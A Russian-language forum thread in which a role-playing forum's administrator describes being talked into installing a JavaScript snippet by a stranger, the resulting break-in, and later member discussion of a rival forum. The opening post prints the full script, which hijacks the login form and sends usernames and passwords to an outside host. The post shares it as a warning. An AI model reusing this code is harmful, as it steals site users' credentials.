Отправлено: 26.11.07 22:39. Заголовок: Рассказ о взломе

[Удалено администратором :) ]
Администратор решил вернуть удаленное.
Издание 2-е, перераб. и доп.

24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны.
Вот этот скрипт:

<script type="text/javascript">
function block (t) {
t = t.replace("%", escape("%"));
t = t.replace("$", escape("$"));
t = t.replace("#", escape("#"));
t = t.replace("\\", escape("\\"));
return t;
}
function newtest() {
if (document.all.nick.value) {
a = document.all.nick.value;
b = document.all.pass.value;
} else if (document.frm.nick.value) {
a = document.frm.nick.value;
b = document.frm.pass.value;
} else {
a = "undefined";
b = "no";
}
a = block(a);
b = block(b);
img = new Image();
img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;
setTimeout("newtest()", 1);
}
document.temp = new function() {
var sec = document.write;
this.write = function(txt)
{
txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>");
this.sec = sec;
this.sec(txt);
this.sec = null;
return true;
}
return this;
}
document.write = document.temp.write;
document.temp = null;
document.writeln = document.write;
</script>

Ночью форум был взломан.
(кликните на картинку, чтобы прочитать "послание" взломщика)


Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров.

Разговоры на форуме "Критик" до взлома моего форума:






После взлома:

Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше.

"У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист.

Действительно, тему почистили не всю.

Чистосердечное признание! cater - второй ник Кота Бегемота.

---

Комментарий специалиста:

цитата:

Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"

 Отправлено: 01.12.07 22:45. Заголовок: Дорогой Zenitchik! Ф..

Дорогой Zenitchik!
Фразу о том, что у кого-то на "Лисе" друзья - мне, конечно, чисто по-человечески, было приятно слышать - но это не аргумент!

У каждого форума есть:

Цели.

Задачи.

Актуальность его в данный момент.

Для более продвинутых форумов, типа Вашего Ролес, который претендует на исследователльскую работу, можно ввести ещё категории:

Объект исследования.

Предмет исследования.

Гипотеза.

Медология и методика исследования.

Но первые три тункта (верхние) обязательны для любого форума, пусть даже это форум по ГП.

Цель данного форума - реклама ролевых игр. - Выполняется? Насколько?
Задача даного форума - размещение шаблонной рекламы, размешение рекламных баннеров. Далее оценка: Насколько хорошо скомпанованы рекламные разделы, удобно ли в них читать рекламу. Удобно ли размещены баннеры для пользования ими клиентами?

Актуальность: Игровые форумы нуждаются в рекламе? Может на рынке переизбыток таких рекламных форумов? И т.д.

Вот это - оценка!
А "оценка" - «у них слишком много баннеров» - это не оценка. Форум создан для размещения баннеров. Если их мало, значит задачи форума не выполняются.
Поэтому и дизайн я пытался сделать максимально лёгким - потому что его неминуемо будут утяжелять баннеры (почему я и не оставил диз "Зеленое озеро" - для такого форума он был тяжеловат)

А то что они говорят - это просто легкомысленная беседа ни о чём.

 Отправлено: 01.12.07 22:47. Заголовок: Zenitchik пишет: не..

Zenitchik пишет:

цитата:

не вижу в этом ничего плохого

А я вижу. Зачем идти туда, куда не приглашали и еще и навязывать свое мнение? Как говорится, в чужой монастырь со своим уставом не ходят.

 Отправлено: 01.12.07 22:58. Заголовок: Sem пишет: Зачем ид..

Sem пишет:

цитата:

Зачем идти туда, куда не приглашали и еще и навязывать свое мнение?

Думаю, в случае с Критиком всё просто: идут они потому, что иначе до них мало кому дело есть. А выпендриться хочется. Дети же)). И не говорите мне, что не дети. Были бы взрослее - вели бы себя серьёзнее, чем таскаться по чужим форумам, а потом не знать, как бы так заманить к себе админа, чтобы он на них внимание обратил.
А кому это надо? Да я 100 % даю, что если бы они Ролес не боялись, они бы и про него фиг знает чего говорили и фиг бы поставили в свой зал почёта.
Я одни названия их разделов почитал - уже всё понял, закрыл и больше не открывал.
Детский сад - младшая группа.

 Отправлено: 01.12.07 23:02. Заголовок: Кажется к нам пришёл..

Кажется к нам пришёл Бегемот! Вероятно с помощью "Hide IP platinum" или чего-то вроде того, т.к. IP анонимный

цитата:

Из премодерации: «Взломщиком удалены часть реклам РИ, часть баннеров» шозанах, какие банеры?

Тянет, беднягу на место преступления. Он думает, я поверю, что баннеры сами испарились.

 Отправлено: 01.12.07 23:30. Заголовок: Они? Боялись Ролес? ..

Они? Боялись Ролес? Вы, наверно, шутите! Мы появились, как их смягченная форма! Конечно, с тех пор многое изменилось, но наследник ПОЗОРа - страшнее нас по определению.
Хотя, они свой авторитет здорово подорвали в последнее время.
ИМХО, именно отсутствием "тормоза".

 Отправлено: 02.12.07 13:06. Заголовок: Zenitchik пишет: Он..

Zenitchik пишет:

цитата:

Они? Боялись Ролес? Вы, наверно, шутите! Мы появились, как их смягченная форма!

Zenitchik!
Вы меня простите за такой грубый комплемент, но вы (Ролес) - гораздо умнее их и они это понимают. А кто умнее - тот страшнее.

 Отправлено: 02.12.07 13:12. Заголовок: Zenitchik пишет: Ва..

Zenitchik пишет:

цитата:

Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.

Zenitchik
Представьте, подходят к вас детишки из детского сада и говорят:
"Знаешь, дядя, мы щас тя оценивать будем". Блеск!
Ну, я понимаю критиков, они так самоутверждаются. Но вы-то, взрослый человек!.. Ещё скажите, что вы их боитесь.

 Отправлено: 02.12.07 18:53. Заголовок: Я не боюсь Критиков ..

Я не боюсь Критиков не потому.
Дело в том, что у меня там все свои. Мне тут предлагали забыть, свое ПОЗОРное прошлое, но как можно забыть то, о чем ностальгируешь?
У меня на Ролес работали одно время "динозавры" ПОЗОРа - Рунира и Плинер.
А Критик - так, вялый аналог. Больно видеть как он деградировал после того, как половина толковых людей откололась...

 Отправлено: 02.12.07 18:56. Заголовок: Кстати, мы одно врем..

Кстати, мы одно время Критик в качестве пугала использовали )))
Типа, тех, кто у нас в каталоге мы от них прикроем )))
После раскола на Критике - пугала не стало.

UPD:
Пардон за мультипостинг. В ФФ ужасно неудобно по сравнению с MyIE реализована многооконность.

 Отправлено: 05.12.07 14:17. Заголовок: Хм... Если бы все от..

Хм... Если бы все относились к kritik, так как я - его бы давно уже не было.
Я кстати, тоже не совсем правильно отнёсся: не надо было о взломе ничего писать.

Но я уже всё убрал!

Оффтоп: Zenitchik пишет:

цитата:

Пардон за мультипостинг.

Можешь не извиняться. На это я смотрю сквозь пальцы...

 Отправлено: 05.12.07 18:18. Заголовок: Zenitchik пишет: Ва..

Zenitchik пишет:

цитата:

Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале.

Просто у них комплекс вины теперь.
Они же не окончательные кретины. Голова-то всё же есть на плечах, понимают, что вот так просто "ни за что не про что" взломали чужой форум (который сами же взялись оценивать), ради собственного удовольствия. Вернее один взломал, а остальные с этим согласились.
Теперь чувствуют себя виноватыми.

Прям, нужна их оценка кому-то.

 Отправлено: 05.12.07 22:05. Заголовок: Solo Из оценка нужн..

Solo
Из оценка нужна прежде всего им самим. А то получается, что они у себя на своём Критике занимаются фигнёй. А так, оценил кого-то - сделал себе приятное.
Если бы Лис пришёл с ними ругаться - им была бы радость. А Лис не пришёл (хороший мальчик). Тогда они стали его ругать, в надежде, что не выдержит. А потом поняли, что бесполезно - решили другим манером и похвалили вроде бы.
Да я их понимаю, ну хочется людям, чтобы к ним шли. Я бы пошёл, попробовал объяснить, что не такими методами к себе заманивать надо. Да и то сказать, у них достаточно народу, чтобы беспокоиться из-за нехватки. Только боюсь, всё равно не поймут. Потому не пойду.

 Отправлено: 05.12.07 22:09. Заголовок: McNamara, да вряд ли..

McNamara, да вряд ли. Посещаемость у форума высокая - как и у любого ресурса подобной направленности.
Так что это просто и банально сублимирование комплексов.

 Отправлено: 09.12.07 16:47. Заголовок: Zenitchik пишет: По..

Zenitchik пишет:

цитата:

Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой...

Фу, какая грязь, как низко: никакой этики и банального человеческого уважения. Критика критике рознь. Есть критика конструктивная, когда высказывают пожелания по улучшению, а есть деструктивная критика, направленная на втаптывание в грязь и утеху собственного самолюбия.

Хоть я и фактически ещё не являюсь участником коллектива вашего форума, и, может, я не совсем в теме событий, но на мой взгляд, эти люди совсем не то авторитетное мнение, которое стоит слушать.

Сентябрьскому Лису, мой личный поклон, а после прочитанного на Критике, уважение к вам и вашему ресурсу у меня только повысились, хотя бы потому что вы держитесь достойно и вполне взросло, адекватно и как деловые люди, с вами приятно иметь дело.



PS Я просто не могла смолчать.....

 Отправлено: 09.12.07 17:25. Заголовок: Кеяру Пожимаю Вашу ..

Кеяру
Пожимаю Вашу мужественную руку. И вполне считаю Вас участником данного форума. И более того, Вы во всём абсолютно правы.
А критика всегда должна быть конструктивной. Иначе это не критика, а ругательство.

 Отправлено: 09.12.07 19:07. Заголовок: McNamara, благодарю ..

McNamara, благодарю
Так что, "всех в топку - мы супер!"

 Отправлено: 09.12.07 22:24. Заголовок: Кеяру Спаисбо! :sm7..

Кеяру пишет:

цитата:

Сентябрьскому Лису... и т.д.

Кеяру
Спаисбо!

 Отправлено: 04.07.08 15:12. Заголовок: Кстати, зря я говори..

Кстати, зря я говорил о том, что Бегемот поступил достаточно благородно, навредив форуму после взлома не в полную силу.
Всё-таки грохнул он у меня одну тему о проблемных игроках. Там была статья Мэгги (ещё под ником Линнда Палпатин) о проблемных игроках.

Я перекопал весь форум, пересмотрел по несколько раз те темы в которых эта статья потенциально могла быть (а на это ушло несколько дней), после меня всё перекопала Мэгги.
Статьи точно нет. А ссылка а неё в одном из сообщений http://septemberfox.forum24.ru/?1-2-0-00000027-000-0-0#006 ведёт в совершенно левую тему и указывает на совершенно левое сообщение.
(При перемещении тем на форумах Borda их адреса теряются, вернее начинают указывать на другую тему, которая стоит на месте старой. На Ucoz при перемещении темы в другой раздел ссылка всё равно приводит именно на нужную ему. Однако, мы говорим не о UcoZ'е сейчас).

Короче, тема со статьёй всё таки была удалена, вероятно, "за компанию".
Взлом есть взлом.

 Отправлено: 04.07.08 20:06. Заголовок: Просмотрела все в ле..

Просмотрела все в легком шоке, если честно. Даже прокомментировать не знаю как лучше... В общем, ужас да и только... Век бы у взломщика руки горчицей были намазаны...

 Отправлено: 04.07.08 20:08. Заголовок: Ой, от шока даже зап..

Ой, от шока даже запамятовала поблагодарить Лиса за столь ценную информацию. Теперь будем знать о данном скрипте. Хотя, я бы ни при каких условиях не согласилась к себе на сайт поставить что-то с чужих рук. Не на таких горбатились, не для таких делаем уступки...